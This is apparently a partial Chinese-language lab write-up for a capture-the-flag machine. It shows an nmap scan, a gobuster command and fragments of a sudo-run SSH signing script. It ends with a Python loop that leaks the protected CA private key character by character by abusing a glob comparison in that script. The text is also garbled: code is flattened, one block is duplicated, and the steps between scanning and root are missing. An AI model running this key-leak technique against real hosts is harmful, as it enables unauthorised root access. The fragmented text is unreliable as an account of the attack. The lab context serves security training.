$ nmap -sC -sV -Pn 10.10.11.27 Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-05 15:37 CST Nmap scan report for 10.10.11.27 Host is up (0.091s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) | ssh-hostkey: | 256 d5:4f:62:39:7b:d2:22:f0:a8:8a:d9:90:35:60:56:88 (ECDSA) |_ 256 fb:67:b0:60:52:f2:12:7e:6c:13:fb:75:f2:bb:1a:ca (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://itrc.ssg.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA) |_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 39.86 seconds
80
需要加hosts,IT Resource Center:
1
10.10.11.27 itrc.ssg.htb
目录扫描
目录扫描可以发现admin,另外测试功能可以注意到实际上是使用page参数访问各个页面:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://itrc.ssg.htb/
supported_principals="webserver,analytics,support,security" IFS=',' read -ra principal <<< "$principal_str" for word in "${principal[@]}"; do if ! echo "$supported_principals" | grep -qw "$word"; then echo "Error: '$word' is not a supported principal." echo "Choose from:" echo " webserver - external web servers - webadmin user" echo " analytics - analytics team databases - analytics user" echo " support - IT support server - support user" echo " security - SOC servers - support user" echo usage fi done
if [ ! -f "$public_key_file" ]; then echo "Error: Public key file '$public_key_file' not found." usage fi
if [ ! -f "$ca_file" ]; then echo "Error: CA file '$ca_file' not found." usage fi
if [[ $ca == "/etc/ssh/ca-it" ]]; then echo "Error: Use API for signing with this CA." usage fi
itca=$(cat /etc/ssh/ca-it) ca=$(cat "$ca_file") if [[ $itca == $ca ]]; then echo "Error: Use API for signing with this CA." usage fi
if [ ! -f "$public_key_file" ]; then echo "Error: Public key file '$public_key_file' not found." usage fi
supported_principals="webserver,analytics,support,security" IFS=',' read -ra principal <<< "$principal_str" for word in "${principal[@]}"; do if ! echo "$supported_principals" | grep -qw "$word"; then echo "Error: '$word' is not a supported principal." echo "Choose from:" echo " webserver - external web servers - webadmin user" echo " analytics - analytics team databases - analytics user" echo " support - IT support server - support user" echo " security - SOC servers - support user" echo usage fi done
if ! [[ $serial =~ ^[0-9]+$ ]]; then echo "Error: '$serial' is not a number." usage fi
# Iterates over each character to testif it's the next correct one while True: for char in ba64chars: # Constructs a test key with * testKey = f"{header}\n{''.join(key)}{char}*" with open("ca-test", "w") as f: f.write(testKey) proc = subprocess.run( ["sudo", "/opt/sign_key.sh", "ca-test", "miao.pub", "root", "root_user", "1"], capture_output=True ) # If matched, Error code 1 if proc.returncode == 1: key.append(char) # Adds a newline every 70 characters if len(key) > 1 and (len(key) - line) % 70 == 0: key.append("\n") line += 1 break else: break
# Constructs the final SSH key from the discovered characters caKey = f"{header}\n{''.join(key)}\n{footer}" print("The final leaked ca-it is: ", caKey) with open("ca-it", "w") as f: f.write(caKey)